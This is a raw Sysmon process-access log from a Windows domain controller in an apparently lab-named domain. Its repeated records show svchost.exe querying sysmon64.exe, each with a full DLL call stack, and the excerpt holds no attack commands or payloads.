12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.674{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.674{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 